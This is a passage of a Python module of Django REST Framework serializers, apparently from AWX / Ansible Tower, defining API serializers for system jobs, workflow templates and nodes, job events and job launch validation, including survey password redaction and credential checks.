self.reverse('api:system_job_template_notification_templates_success_list', kwargs={'pk': obj.pk}),\n notification_templates_error = self.reverse('api:system_job_template_notification_templates_error_list', kwargs={'pk': obj.pk}),\n\n ))\n return res\n\n\nclass SystemJobSerializer(UnifiedJobSerializer):\n\n result_stdout = serializers.SerializerMethodField()\n\n class Meta:\n model = SystemJob\n fields = ('*', 'system_job_template', 'job_type', 'extra_vars', 'result_stdout', '-controller_node',)\n\n def get_related(self, obj):\n res = super(SystemJobSerializer, self).get_related(obj)\n if obj.system_job_template:\n res['system_job_template'] = self.reverse('api:system_job_template_detail',\n kwargs={'pk': obj.system_job_template.pk})\n res['notifications'] = self.reverse('api:system_job_notifications_list', kwargs={'pk': obj.pk})\n if obj.can_cancel or True:\n res['cancel'] = self.reverse('api:system_job_cancel', kwargs={'pk': obj.pk})\n res['events'] = self.reverse('api:system_job_events_list', kwargs={'pk': obj.pk})\n return res\n\n def get_result_stdout(self, obj):\n try:\n return obj.result_stdout\n except StdoutMaxBytesExceeded as e:\n return _(\n \"Standard Output too large to display ({text_size} bytes), \"\n \"only download supported for sizes over {supported_size} bytes.\").format(\n text_size=e.total, supported_size=e.supported\n )\n\n\nclass SystemJobCancelSerializer(SystemJobSerializer):\n\n can_cancel = serializers.BooleanField(read_only=True)\n\n class Meta:\n fields = ('can_cancel',)\n\n\nclass WorkflowJobTemplateSerializer(JobTemplateMixin, LabelsListMixin, UnifiedJobTemplateSerializer):\n show_capabilities = ['start', 'schedule', 'edit', 'copy', 'delete']\n capabilities_prefetch = [\n 'admin', 'execute',\n {'copy': 'organization.workflow_admin'}\n ]\n\n class Meta:\n model = WorkflowJobTemplate\n fields = ('*', 'extra_vars', 'organization', 'survey_enabled', 'allow_simultaneous',\n 'ask_variables_on_launch', 'inventory', 'ask_inventory_on_launch',)\n\n def get_related(self, obj):\n res = super(WorkflowJobTemplateSerializer, self).get_related(obj)\n res.update(dict(\n workflow_jobs = self.reverse('api:workflow_job_template_jobs_list', kwargs={'pk': obj.pk}),\n schedules = self.reverse('api:workflow_job_template_schedules_list', kwargs={'pk': obj.pk}),\n launch = self.reverse('api:workflow_job_template_launch', kwargs={'pk': obj.pk}),\n workflow_nodes = self.reverse('api:workflow_job_template_workflow_nodes_list', kwargs={'pk': obj.pk}),\n labels = self.reverse('api:workflow_job_template_label_list', kwargs={'pk': obj.pk}),\n activity_stream = self.reverse('api:workflow_job_template_activity_stream_list', kwargs={'pk': obj.pk}),\n notification_templates_any = self.reverse('api:workflow_job_template_notification_templates_any_list', kwargs={'pk': obj.pk}),\n notification_templates_success = self.reverse('api:workflow_job_template_notification_templates_success_list', kwargs={'pk': obj.pk}),\n notification_templates_error = self.reverse('api:workflow_job_template_notification_templates_error_list', kwargs={'pk': obj.pk}),\n access_list = self.reverse('api:workflow_job_template_access_list', kwargs={'pk': obj.pk}),\n object_roles = self.reverse('api:workflow_job_template_object_roles_list', kwargs={'pk': obj.pk}),\n survey_spec = self.reverse('api:workflow_job_template_survey_spec', kwargs={'pk': obj.pk}),\n copy = self.reverse('api:workflow_job_template_copy', kwargs={'pk': obj.pk}),\n ))\n if obj.organization:\n res['organization'] = self.reverse('api:organization_detail', 
kwargs={'pk': obj.organization.pk})\n return res\n\n def validate_extra_vars(self, value):\n return vars_validate_or_raise(value)\n\n\nclass WorkflowJobTemplateWithSpecSerializer(WorkflowJobTemplateSerializer):\n '''\n Used for activity stream entries.\n '''\n\n class Meta:\n model = WorkflowJobTemplate\n fields = ('*', 'survey_spec')\n\n\nclass WorkflowJobSerializer(LabelsListMixin, UnifiedJobSerializer):\n\n class Meta:\n model = WorkflowJob\n fields = ('*', 'workflow_job_template', 'extra_vars', 'allow_simultaneous',\n 'job_template', 'is_sliced_job',\n '-execution_node', '-event_processing_finished', '-controller_node',\n 'inventory',)\n\n def get_related(self, obj):\n res = super(WorkflowJobSerializer, self).get_related(obj)\n if obj.workflow_job_template:\n res['workflow_job_template'] = self.reverse('api:workflow_job_template_detail',\n kwargs={'pk': obj.workflow_job_template.pk})\n res['notifications'] = self.reverse('api:workflow_job_notifications_list', kwargs={'pk': obj.pk})\n if obj.job_template_id:\n res['job_template'] = self.reverse('api:job_template_detail', kwargs={'pk': obj.job_template_id})\n res['workflow_nodes'] = self.reverse('api:workflow_job_workflow_nodes_list', kwargs={'pk': obj.pk})\n res['labels'] = self.reverse('api:workflow_job_label_list', kwargs={'pk': obj.pk})\n res['activity_stream'] = self.reverse('api:workflow_job_activity_stream_list', kwargs={'pk': obj.pk})\n res['relaunch'] = self.reverse('api:workflow_job_relaunch', kwargs={'pk': obj.pk})\n if obj.can_cancel or True:\n res['cancel'] = self.reverse('api:workflow_job_cancel', kwargs={'pk': obj.pk})\n return res\n\n def to_representation(self, obj):\n ret = super(WorkflowJobSerializer, self).to_representation(obj)\n if obj is None:\n return ret\n if 'extra_vars' in ret:\n ret['extra_vars'] = obj.display_extra_vars()\n return ret\n\n\nclass WorkflowJobListSerializer(WorkflowJobSerializer, UnifiedJobListSerializer):\n\n class Meta:\n fields = ('*', '-execution_node', '-controller_node',)\n\n\nclass WorkflowJobCancelSerializer(WorkflowJobSerializer):\n\n can_cancel = serializers.BooleanField(read_only=True)\n\n class Meta:\n fields = ('can_cancel',)\n\n\nclass LaunchConfigurationBaseSerializer(BaseSerializer):\n job_type = serializers.ChoiceField(allow_blank=True, allow_null=True, required=False, default=None,\n choices=NEW_JOB_TYPE_CHOICES)\n job_tags = serializers.CharField(allow_blank=True, allow_null=True, required=False, default=None)\n limit = serializers.CharField(allow_blank=True, allow_null=True, required=False, default=None)\n skip_tags = serializers.CharField(allow_blank=True, allow_null=True, required=False, default=None)\n diff_mode = serializers.NullBooleanField(required=False, default=None)\n verbosity = serializers.ChoiceField(allow_null=True, required=False, default=None,\n choices=VERBOSITY_CHOICES)\n exclude_errors = ()\n\n class Meta:\n fields = ('*', 'extra_data', 'inventory', # Saved launch-time config fields\n 'job_type', 'job_tags', 'skip_tags', 'limit', 'skip_tags', 'diff_mode', 'verbosity')\n\n def get_related(self, obj):\n res = super(LaunchConfigurationBaseSerializer, self).get_related(obj)\n if obj.inventory_id:\n res['inventory'] = self.reverse('api:inventory_detail', kwargs={'pk': obj.inventory_id})\n res['credentials'] = self.reverse(\n 'api:{}_credentials_list'.format(get_type_for_model(self.Meta.model)),\n kwargs={'pk': obj.pk}\n )\n return res\n\n def _build_mock_obj(self, attrs):\n mock_obj = self.Meta.model()\n if self.instance:\n for field in 
self.instance._meta.fields:\n setattr(mock_obj, field.name, getattr(self.instance, field.name))\n field_names = set(field.name for field in self.Meta.model._meta.fields)\n for field_name, value in list(attrs.items()):\n setattr(mock_obj, field_name, value)\n if field_name not in field_names:\n attrs.pop(field_name)\n return mock_obj\n\n def to_representation(self, obj):\n ret = super(LaunchConfigurationBaseSerializer, self).to_representation(obj)\n if obj is None:\n return ret\n if 'extra_data' in ret and obj.survey_passwords:\n ret['extra_data'] = obj.display_extra_vars()\n return ret\n\n def get_summary_fields(self, obj):\n summary_fields = super(LaunchConfigurationBaseSerializer, self).get_summary_fields(obj)\n # Credential would be an empty dictionary in this case\n summary_fields.pop('credential', None)\n return summary_fields\n\n def validate(self, attrs):\n db_extra_data = {}\n if self.instance:\n db_extra_data = parse_yaml_or_json(self.instance.extra_data)\n\n attrs = super(LaunchConfigurationBaseSerializer, self).validate(attrs)\n\n ujt = None\n if 'unified_job_template' in attrs:\n ujt = attrs['unified_job_template']\n elif self.instance:\n ujt = self.instance.unified_job_template\n\n # build additional field survey_passwords to track redacted variables\n password_dict = {}\n extra_data = parse_yaml_or_json(attrs.get('extra_data', {}))\n if hasattr(ujt, 'survey_password_variables'):\n # Prepare additional field survey_passwords for save\n for key in ujt.survey_password_variables():\n if key in extra_data:\n password_dict[key] = REPLACE_STR\n\n # Replace $encrypted$ submissions with db value if exists\n if 'extra_data' in attrs:\n if password_dict:\n if not self.instance or password_dict != self.instance.survey_passwords:\n attrs['survey_passwords'] = password_dict.copy()\n # Force dict type (cannot preserve YAML formatting if passwords are involved)\n # Encrypt the extra_data for save, only current password vars in JT survey\n # but first, make a copy or else this is referenced by request.data, and\n # user could get encrypted string in form data in API browser\n attrs['extra_data'] = extra_data.copy()\n encrypt_dict(attrs['extra_data'], password_dict.keys())\n # For any raw $encrypted$ string, either\n # - replace with existing DB value\n # - raise a validation error\n # - ignore, if default present\n for key in password_dict.keys():\n if attrs['extra_data'].get(key, None) == REPLACE_STR:\n if key not in db_extra_data:\n element = ujt.pivot_spec(ujt.survey_spec)[key]\n # NOTE: validation _of_ the default values of password type\n # questions not done here or on launch, but doing so could\n # leak info about values, so it should not be added\n if not ('default' in element and element['default']):\n raise serializers.ValidationError(\n {\"extra_data\": _('Provided variable {} has no database value to replace with.').format(key)})\n else:\n attrs['extra_data'][key] = db_extra_data[key]\n\n # Build unsaved version of this config, use it to detect prompts errors\n mock_obj = self._build_mock_obj(attrs)\n accepted, rejected, errors = ujt._accept_or_ignore_job_kwargs(\n _exclude_errors=self.exclude_errors, **mock_obj.prompts_dict())\n\n # Remove all unprocessed $encrypted$ strings, indicating default usage\n if 'extra_data' in attrs and password_dict:\n for key, value in attrs['extra_data'].copy().items():\n if value == REPLACE_STR:\n if key in password_dict:\n attrs['extra_data'].pop(key)\n attrs.get('survey_passwords', {}).pop(key, None)\n else:\n errors.setdefault('extra_vars', 
[]).append(\n _('\"$encrypted$ is a reserved keyword, may not be used for {var_name}.\"').format(var_name=key)\n )\n\n # Launch configs call extra_vars extra_data for historical reasons\n if 'extra_vars' in errors:\n errors['extra_data'] = errors.pop('extra_vars')\n if errors:\n raise serializers.ValidationError(errors)\n\n # Model `.save` needs the container dict, not the pseudo fields\n if mock_obj.char_prompts:\n attrs['char_prompts'] = mock_obj.char_prompts\n\n return attrs\n\n\nclass WorkflowJobTemplateNodeSerializer(LaunchConfigurationBaseSerializer):\n credential = DeprecatedCredentialField()\n success_nodes = serializers.PrimaryKeyRelatedField(many=True, read_only=True)\n failure_nodes = serializers.PrimaryKeyRelatedField(many=True, read_only=True)\n always_nodes = serializers.PrimaryKeyRelatedField(many=True, read_only=True)\n exclude_errors = ('required',) # required variables may be provided by WFJT or on launch\n\n class Meta:\n model = WorkflowJobTemplateNode\n fields = ('*', 'credential', 'workflow_job_template', '-name', '-description', 'id', 'url', 'related',\n 'unified_job_template', 'success_nodes', 'failure_nodes', 'always_nodes',)\n\n def get_related(self, obj):\n res = super(WorkflowJobTemplateNodeSerializer, self).get_related(obj)\n res['success_nodes'] = self.reverse('api:workflow_job_template_node_success_nodes_list', kwargs={'pk': obj.pk})\n res['failure_nodes'] = self.reverse('api:workflow_job_template_node_failure_nodes_list', kwargs={'pk': obj.pk})\n res['always_nodes'] = self.reverse('api:workflow_job_template_node_always_nodes_list', kwargs={'pk': obj.pk})\n if obj.unified_job_template:\n res['unified_job_template'] = obj.unified_job_template.get_absolute_url(self.context.get('request'))\n try:\n res['workflow_job_template'] = self.reverse('api:workflow_job_template_detail', kwargs={'pk': obj.workflow_job_template.pk})\n except WorkflowJobTemplate.DoesNotExist:\n pass\n return res\n\n def build_field(self, field_name, info, model_class, nested_depth):\n # have to special-case the field so that DRF will not automagically make it\n # read-only because it's a property on the model.\n if field_name == 'credential':\n return self.build_standard_field(field_name,\n self.credential)\n return super(WorkflowJobTemplateNodeSerializer, self).build_field(field_name, info, model_class, nested_depth)\n\n def build_relational_field(self, field_name, relation_info):\n field_class, field_kwargs = super(WorkflowJobTemplateNodeSerializer, self).build_relational_field(field_name, relation_info)\n # workflow_job_template is read-only unless creating a new node.\n if self.instance and field_name == 'workflow_job_template':\n field_kwargs['read_only'] = True\n field_kwargs.pop('queryset', None)\n return field_class, field_kwargs\n\n def validate(self, attrs):\n deprecated_fields = {}\n if 'credential' in attrs: # TODO: remove when v2 API is deprecated\n deprecated_fields['credential'] = attrs.pop('credential')\n view = self.context.get('view')\n attrs = super(WorkflowJobTemplateNodeSerializer, self).validate(attrs)\n ujt_obj = None\n if 'unified_job_template' in attrs:\n ujt_obj = attrs['unified_job_template']\n elif self.instance:\n ujt_obj = self.instance.unified_job_template\n if 'credential' in deprecated_fields: # TODO: remove when v2 API is deprecated\n cred = deprecated_fields['credential']\n attrs['credential'] = cred\n if cred is not None:\n if not ujt_obj.ask_credential_on_launch:\n raise serializers.ValidationError({\"credential\": _(\n \"Related template is not configured to 
accept credentials on launch.\")})\n cred = Credential.objects.get(pk=cred)\n view = self.context.get('view', None)\n if (not view) or (not view.request) or (view.request.user not in cred.use_role):\n raise PermissionDenied()\n return attrs\n\n def create(self, validated_data): # TODO: remove when v2 API is deprecated\n deprecated_fields = {}\n if 'credential' in validated_data:\n deprecated_fields['credential'] = validated_data.pop('credential')\n obj = super(WorkflowJobTemplateNodeSerializer, self).create(validated_data)\n if 'credential' in deprecated_fields:\n if deprecated_fields['credential']:\n obj.credentials.add(deprecated_fields['credential'])\n return obj\n\n def update(self, obj, validated_data): # TODO: remove when v2 API is deprecated\n deprecated_fields = {}\n if 'credential' in validated_data:\n deprecated_fields['credential'] = validated_data.pop('credential')\n obj = super(WorkflowJobTemplateNodeSerializer, self).update(obj, validated_data)\n if 'credential' in deprecated_fields:\n existing = obj.credentials.filter(credential_type__kind='ssh')\n new_cred = deprecated_fields['credential']\n if new_cred not in existing:\n for cred in existing:\n obj.credentials.remove(cred)\n if new_cred:\n obj.credentials.add(new_cred)\n return obj\n\n\nclass WorkflowJobNodeSerializer(LaunchConfigurationBaseSerializer):\n credential = DeprecatedCredentialField()\n success_nodes = serializers.PrimaryKeyRelatedField(many=True, read_only=True)\n failure_nodes = serializers.PrimaryKeyRelatedField(many=True, read_only=True)\n always_nodes = serializers.PrimaryKeyRelatedField(many=True, read_only=True)\n\n class Meta:\n model = WorkflowJobNode\n fields = ('*', 'credential', 'job', 'workflow_job', '-name', '-description', 'id', 'url', 'related',\n 'unified_job_template', 'success_nodes', 'failure_nodes', 'always_nodes',\n 'do_not_run',)\n\n def get_related(self, obj):\n res = super(WorkflowJobNodeSerializer, self).get_related(obj)\n res['success_nodes'] = self.reverse('api:workflow_job_node_success_nodes_list', kwargs={'pk': obj.pk})\n res['failure_nodes'] = self.reverse('api:workflow_job_node_failure_nodes_list', kwargs={'pk': obj.pk})\n res['always_nodes'] = self.reverse('api:workflow_job_node_always_nodes_list', kwargs={'pk': obj.pk})\n if obj.unified_job_template:\n res['unified_job_template'] = obj.unified_job_template.get_absolute_url(self.context.get('request'))\n if obj.job:\n res['job'] = obj.job.get_absolute_url(self.context.get('request'))\n if obj.workflow_job:\n res['workflow_job'] = self.reverse('api:workflow_job_detail', kwargs={'pk': obj.workflow_job.pk})\n return res\n\n\nclass WorkflowJobNodeListSerializer(WorkflowJobNodeSerializer):\n pass\n\n\nclass WorkflowJobNodeDetailSerializer(WorkflowJobNodeSerializer):\n pass\n\n\nclass WorkflowJobTemplateNodeDetailSerializer(WorkflowJobTemplateNodeSerializer):\n '''\n Influence the api browser sample data to not include workflow_job_template\n when editing a WorkflowNode.\n\n Note: I was not able to accomplish this through the use of extra_kwargs.\n Maybe something to do with workflow_job_template being a relational field?\n '''\n def build_relational_field(self, field_name, relation_info):\n field_class, field_kwargs = super(WorkflowJobTemplateNodeDetailSerializer, self).build_relational_field(field_name, relation_info)\n if self.instance and field_name == 'workflow_job_template':\n field_kwargs['read_only'] = True\n field_kwargs.pop('queryset', None)\n return field_class, field_kwargs\n\n\nclass JobListSerializer(JobSerializer, 
UnifiedJobListSerializer):\n pass\n\n\nclass AdHocCommandListSerializer(AdHocCommandSerializer, UnifiedJobListSerializer):\n pass\n\n\nclass SystemJobListSerializer(SystemJobSerializer, UnifiedJobListSerializer):\n\n class Meta:\n model = SystemJob\n fields = ('*', '-controller_node') # field removal undone by UJ serializer\n\n\nclass JobHostSummarySerializer(BaseSerializer):\n\n class Meta:\n model = JobHostSummary\n fields = ('*', '-name', '-description', 'job', 'host', 'host_name', 'changed',\n 'dark', 'failures', 'ok', 'processed', 'skipped', 'failed',\n 'ignored', 'rescued')\n\n def get_related(self, obj):\n res = super(JobHostSummarySerializer, self).get_related(obj)\n res.update(dict(\n job=self.reverse('api:job_detail', kwargs={'pk': obj.job.pk})))\n if obj.host is not None:\n res.update(dict(\n host=self.reverse('api:host_detail', kwargs={'pk': obj.host.pk})\n ))\n return res\n\n def get_summary_fields(self, obj):\n d = super(JobHostSummarySerializer, self).get_summary_fields(obj)\n try:\n d['job']['job_template_id'] = obj.job.job_template.id\n d['job']['job_template_name'] = obj.job.job_template.name\n except (KeyError, AttributeError):\n pass\n return d\n\n\nclass JobEventSerializer(BaseSerializer):\n\n event_display = serializers.CharField(source='get_event_display2', read_only=True)\n event_level = serializers.IntegerField(read_only=True)\n\n class Meta:\n model = JobEvent\n fields = ('*', '-name', '-description', 'job', 'event', 'counter',\n 'event_display', 'event_data', 'event_level', 'failed',\n 'changed', 'uuid', 'parent_uuid', 'host', 'host_name', 'parent',\n 'playbook', 'play', 'task', 'role', 'stdout', 'start_line', 'end_line',\n 'verbosity')\n\n def get_related(self, obj):\n res = super(JobEventSerializer, self).get_related(obj)\n res.update(dict(\n job = self.reverse('api:job_detail', kwargs={'pk': obj.job_id}),\n ))\n if obj.parent_id:\n res['parent'] = self.reverse('api:job_event_detail', kwargs={'pk': obj.parent_id})\n res['children'] = self.reverse('api:job_event_children_list', kwargs={'pk': obj.pk})\n if obj.host_id:\n res['host'] = self.reverse('api:host_detail', kwargs={'pk': obj.host_id})\n if obj.hosts.exists():\n res['hosts'] = self.reverse('api:job_event_hosts_list', kwargs={'pk': obj.pk})\n return res\n\n def get_summary_fields(self, obj):\n d = super(JobEventSerializer, self).get_summary_fields(obj)\n try:\n d['job']['job_template_id'] = obj.job.job_template.id\n d['job']['job_template_name'] = obj.job.job_template.name\n except (KeyError, AttributeError):\n pass\n return d\n\n def to_representation(self, obj):\n ret = super(JobEventSerializer, self).to_representation(obj)\n # Show full stdout for event detail view, truncate only for list view.\n if hasattr(self.context.get('view', None), 'retrieve'):\n return ret\n # Show full stdout for playbook_on_* events.\n if obj and obj.event.startswith('playbook_on'):\n return ret\n max_bytes = settings.EVENT_STDOUT_MAX_BYTES_DISPLAY\n if max_bytes > 0 and 'stdout' in ret and len(ret['stdout']) >= max_bytes:\n ret['stdout'] = ret['stdout'][:(max_bytes - 1)] + u'\\u2026'\n set_count = 0\n reset_count = 0\n for m in ANSI_SGR_PATTERN.finditer(ret['stdout']):\n if m.string[m.start():m.end()] == u'\\u001b[0m':\n reset_count += 1\n else:\n set_count += 1\n ret['stdout'] += u'\\u001b[0m' * (set_count - reset_count)\n return ret\n\n\nclass JobEventWebSocketSerializer(JobEventSerializer):\n created = serializers.SerializerMethodField()\n modified = serializers.SerializerMethodField()\n event_name = 
serializers.CharField(source='event')\n group_name = serializers.SerializerMethodField()\n\n class Meta:\n model = JobEvent\n fields = ('*', 'event_name', 'group_name',)\n\n def get_created(self, obj):\n return obj.created.isoformat()\n\n def get_modified(self, obj):\n return obj.modified.isoformat()\n\n def get_group_name(self, obj):\n return 'job_events'\n\n\nclass ProjectUpdateEventSerializer(JobEventSerializer):\n stdout = serializers.SerializerMethodField()\n event_data = serializers.SerializerMethodField()\n\n class Meta:\n model = ProjectUpdateEvent\n fields = ('*', '-name', '-description', '-job', '-job_id',\n '-parent_uuid', '-parent', '-host', 'project_update')\n\n def get_related(self, obj):\n res = super(JobEventSerializer, self).get_related(obj)\n res['project_update'] = self.reverse(\n 'api:project_update_detail', kwargs={'pk': obj.project_update_id}\n )\n return res\n\n def get_stdout(self, obj):\n return UriCleaner.remove_sensitive(obj.stdout)\n\n def get_event_data(self, obj):\n try:\n return json.loads(\n UriCleaner.remove_sensitive(\n json.dumps(obj.event_data)\n )\n )\n except Exception:\n logger.exception(\"Failed to sanitize event_data\")\n return {}\n\n\nclass ProjectUpdateEventWebSocketSerializer(ProjectUpdateEventSerializer):\n created = serializers.SerializerMethodField()\n modified = serializers.SerializerMethodField()\n event_name = serializers.CharField(source='event')\n group_name = serializers.SerializerMethodField()\n\n class Meta:\n model = ProjectUpdateEvent\n fields = ('*', 'event_name', 'group_name',)\n\n def get_created(self, obj):\n return obj.created.isoformat()\n\n def get_modified(self, obj):\n return obj.modified.isoformat()\n\n def get_group_name(self, obj):\n return 'project_update_events'\n\n\nclass AdHocCommandEventSerializer(BaseSerializer):\n\n event_display = serializers.CharField(source='get_event_display', read_only=True)\n\n class Meta:\n model = AdHocCommandEvent\n fields = ('*', '-name', '-description', 'ad_hoc_command', 'event',\n 'counter', 'event_display', 'event_data', 'failed',\n 'changed', 'uuid', 'host', 'host_name', 'stdout',\n 'start_line', 'end_line', 'verbosity')\n\n def get_related(self, obj):\n res = super(AdHocCommandEventSerializer, self).get_related(obj)\n res.update(dict(\n ad_hoc_command = self.reverse('api:ad_hoc_command_detail', kwargs={'pk': obj.ad_hoc_command_id}),\n ))\n if obj.host:\n res['host'] = self.reverse('api:host_detail', kwargs={'pk': obj.host.pk})\n return res\n\n def to_representation(self, obj):\n ret = super(AdHocCommandEventSerializer, self).to_representation(obj)\n # Show full stdout for event detail view, truncate only for list view.\n if hasattr(self.context.get('view', None), 'retrieve'):\n return ret\n max_bytes = settings.EVENT_STDOUT_MAX_BYTES_DISPLAY\n if max_bytes > 0 and 'stdout' in ret and len(ret['stdout']) >= max_bytes:\n ret['stdout'] = ret['stdout'][:(max_bytes - 1)] + u'\\u2026'\n set_count = 0\n reset_count = 0\n for m in ANSI_SGR_PATTERN.finditer(ret['stdout']):\n if m.string[m.start():m.end()] == u'\\u001b[0m':\n reset_count += 1\n else:\n set_count += 1\n ret['stdout'] += u'\\u001b[0m' * (set_count - reset_count)\n return ret\n\n\nclass AdHocCommandEventWebSocketSerializer(AdHocCommandEventSerializer):\n created = serializers.SerializerMethodField()\n modified = serializers.SerializerMethodField()\n event_name = serializers.CharField(source='event')\n group_name = serializers.SerializerMethodField()\n\n class Meta:\n model = AdHocCommandEvent\n fields = ('*', 'event_name', 
'group_name',)\n\n def get_created(self, obj):\n return obj.created.isoformat()\n\n def get_modified(self, obj):\n return obj.modified.isoformat()\n\n def get_group_name(self, obj):\n return 'ad_hoc_command_events'\n\n\nclass InventoryUpdateEventSerializer(AdHocCommandEventSerializer):\n\n class Meta:\n model = InventoryUpdateEvent\n fields = ('*', '-name', '-description', '-ad_hoc_command', '-host',\n '-host_name', 'inventory_update')\n\n def get_related(self, obj):\n res = super(AdHocCommandEventSerializer, self).get_related(obj)\n res['inventory_update'] = self.reverse(\n 'api:inventory_update_detail', kwargs={'pk': obj.inventory_update_id}\n )\n return res\n\n\nclass InventoryUpdateEventWebSocketSerializer(InventoryUpdateEventSerializer):\n created = serializers.SerializerMethodField()\n modified = serializers.SerializerMethodField()\n event_name = serializers.CharField(source='event')\n group_name = serializers.SerializerMethodField()\n\n class Meta:\n model = InventoryUpdateEvent\n fields = ('*', 'event_name', 'group_name',)\n\n def get_created(self, obj):\n return obj.created.isoformat()\n\n def get_modified(self, obj):\n return obj.modified.isoformat()\n\n def get_group_name(self, obj):\n return 'inventory_update_events'\n\n\nclass SystemJobEventSerializer(AdHocCommandEventSerializer):\n\n class Meta:\n model = SystemJobEvent\n fields = ('*', '-name', '-description', '-ad_hoc_command', '-host',\n '-host_name', 'system_job')\n\n def get_related(self, obj):\n res = super(AdHocCommandEventSerializer, self).get_related(obj)\n res['system_job'] = self.reverse(\n 'api:system_job_detail', kwargs={'pk': obj.system_job_id}\n )\n return res\n\n\nclass SystemJobEventWebSocketSerializer(SystemJobEventSerializer):\n created = serializers.SerializerMethodField()\n modified = serializers.SerializerMethodField()\n event_name = serializers.CharField(source='event')\n group_name = serializers.SerializerMethodField()\n\n class Meta:\n model = SystemJobEvent\n fields = ('*', 'event_name', 'group_name',)\n\n def get_created(self, obj):\n return obj.created.isoformat()\n\n def get_modified(self, obj):\n return obj.modified.isoformat()\n\n def get_group_name(self, obj):\n return 'system_job_events'\n\n\nclass JobLaunchSerializer(BaseSerializer):\n\n # Representational fields\n passwords_needed_to_start = serializers.ReadOnlyField()\n can_start_without_user_input = serializers.BooleanField(read_only=True)\n variables_needed_to_start = serializers.ReadOnlyField()\n credential_needed_to_start = serializers.SerializerMethodField()\n inventory_needed_to_start = serializers.SerializerMethodField()\n survey_enabled = serializers.SerializerMethodField()\n job_template_data = serializers.SerializerMethodField()\n defaults = serializers.SerializerMethodField()\n\n # Accepted on launch fields\n extra_vars = serializers.JSONField(required=False, write_only=True)\n inventory = serializers.PrimaryKeyRelatedField(\n queryset=Inventory.objects.all(),\n required=False, write_only=True\n )\n credentials = serializers.PrimaryKeyRelatedField(\n many=True, queryset=Credential.objects.all(),\n required=False, write_only=True\n )\n credential_passwords = VerbatimField(required=False, write_only=True)\n diff_mode = serializers.BooleanField(required=False, write_only=True)\n job_tags = serializers.CharField(required=False, write_only=True, allow_blank=True)\n job_type = serializers.ChoiceField(required=False, choices=NEW_JOB_TYPE_CHOICES, write_only=True)\n skip_tags = serializers.CharField(required=False, write_only=True, 
allow_blank=True)\n limit = serializers.CharField(required=False, write_only=True, allow_blank=True)\n verbosity = serializers.ChoiceField(required=False, choices=VERBOSITY_CHOICES, write_only=True)\n\n class Meta:\n model = JobTemplate\n fields = ('can_start_without_user_input', 'passwords_needed_to_start',\n 'extra_vars', 'inventory', 'limit', 'job_tags', 'skip_tags', 'job_type', 'verbosity', 'diff_mode',\n 'credentials', 'credential_passwords', 'ask_variables_on_launch', 'ask_tags_on_launch',\n 'ask_diff_mode_on_launch', 'ask_skip_tags_on_launch', 'ask_job_type_on_launch', 'ask_limit_on_launch',\n 'ask_verbosity_on_launch', 'ask_inventory_on_launch', 'ask_credential_on_launch',\n 'survey_enabled', 'variables_needed_to_start', 'credential_needed_to_start',\n 'inventory_needed_to_start', 'job_template_data', 'defaults', 'verbosity')\n read_only_fields = (\n 'ask_diff_mode_on_launch', 'ask_variables_on_launch', 'ask_limit_on_launch', 'ask_tags_on_launch',\n 'ask_skip_tags_on_launch', 'ask_job_type_on_launch', 'ask_verbosity_on_launch',\n 'ask_inventory_on_launch', 'ask_credential_on_launch',)\n\n def get_credential_needed_to_start(self, obj):\n return False\n\n def get_inventory_needed_to_start(self, obj):\n return not (obj and obj.inventory)\n\n def get_survey_enabled(self, obj):\n if obj:\n return obj.survey_enabled and 'spec' in obj.survey_spec\n return False\n\n def get_defaults(self, obj):\n defaults_dict = {}\n for field_name in JobTemplate.get_ask_mapping().keys():\n if field_name == 'inventory':\n defaults_dict[field_name] = dict(\n name=getattrd(obj, '%s.name' % field_name, None),\n id=getattrd(obj, '%s.pk' % field_name, None))\n elif field_name == 'credentials':\n for cred in obj.credentials.all():\n cred_dict = dict(\n id=cred.id,\n name=cred.name,\n credential_type=cred.credential_type.pk,\n passwords_needed=cred.passwords_needed\n )\n if cred.credential_type.managed_by_tower and 'vault_id' in cred.credential_type.defined_fields:\n cred_dict['vault_id'] = cred.get_input('vault_id', default=None)\n defaults_dict.setdefault(field_name, []).append(cred_dict)\n else:\n defaults_dict[field_name] = getattr(obj, field_name)\n return defaults_dict\n\n def get_job_template_data(self, obj):\n return dict(name=obj.name, id=obj.id, description=obj.description)\n\n def validate_extra_vars(self, value):\n return vars_validate_or_raise(value)\n\n def validate(self, attrs):\n template = self.context.get('template')\n\n accepted, rejected, errors = template._accept_or_ignore_job_kwargs(\n _exclude_errors=['prompts'], # make several error types non-blocking\n **attrs)\n self._ignored_fields = rejected\n\n if template.inventory and template.inventory.pending_deletion is True:\n errors['inventory'] = _(\"The inventory associated with this Job Template is being deleted.\")\n elif 'inventory' in accepted and accepted['inventory'].pending_deletion:\n errors['inventory'] = _(\"The provided inventory is being deleted.\")\n\n # Prohibit providing multiple credentials of the same CredentialType.kind\n # or multiples of same vault id\n distinct_cred_kinds = []\n for cred in accepted.get('credentials', []):\n if cred.unique_hash() in distinct_cred_kinds:\n errors.setdefault('credentials', []).append(_(\n 'Cannot assign multiple {} credentials.'\n ).format(cred.unique_hash(display=True)))\n if cred.credential_type.kind not in ('ssh', 'vault', 'cloud', 'net'):\n errors.setdefault('credentials', []).append(_(\n 'Cannot assign a Credential of kind `{}`'\n ).format(cred.credential_type.kind))\n 
distinct_cred_kinds.append(cred.unique_hash())\n\n # Prohibit removing credentials from the JT list (unsupported for now)\n template_credentials = template.credentials.all()\n if 'credentials' in attrs:\n removed_creds = set(template_credentials) - set(attrs['credentials'])\n provided_mapping = Credential.unique_dict(attrs['credentials'])\n for cred in removed_creds:\n if cred.unique_hash() in provided_mapping.keys():\n continue # User replaced credential with new of same type\n errors.setdefault('credentials', []).append(_(\n 'Removing {} credential at launch time without replacement is not supported. '\n 'Provided list lacked credential(s): {}.'\n ).format(cred.unique_hash(display=True), ', '.join([str(c) for c in removed_creds])))\n\n # verify that credentials (either provided or existing) don't\n # require launch-time passwords that have not been provided\n if 'credentials' in accepted:\n launch_credentials = accepted['credentials']\n else:\n launch_credentials = template_credentials\n passwords = attrs.get('credential_passwords', {}) # get from original attrs\n passwords_lacking = []\n for cred in launch_credentials:\n for p in cred.passwords_needed:\n if p not in passwords:\n passwords_lacking.append(p)\n else:\n accepted.setdefault('credential_passwords', {})\n accepted['credential_passwords'][p] = passwords[p]\n if len(passwords_lacking):\n errors['passwords_needed_to_start'] = passwords_lacking\n\n if errors:\n raise serializers.ValidationError(errors)\n\n if 'extra_vars' in accepted:\n extra_vars_save = accepted['extra_vars']\n else:\n extra_vars_save = None\n # Validate job against JobTemplate clean_ methods\n accepted = super(JobLaunchSerializer, self).validate(accepted)\n # Preserve extra_vars as dictionary internally\n if extra_vars_save:\n accepted['extra_vars'] = extra_vars_save\n\n return 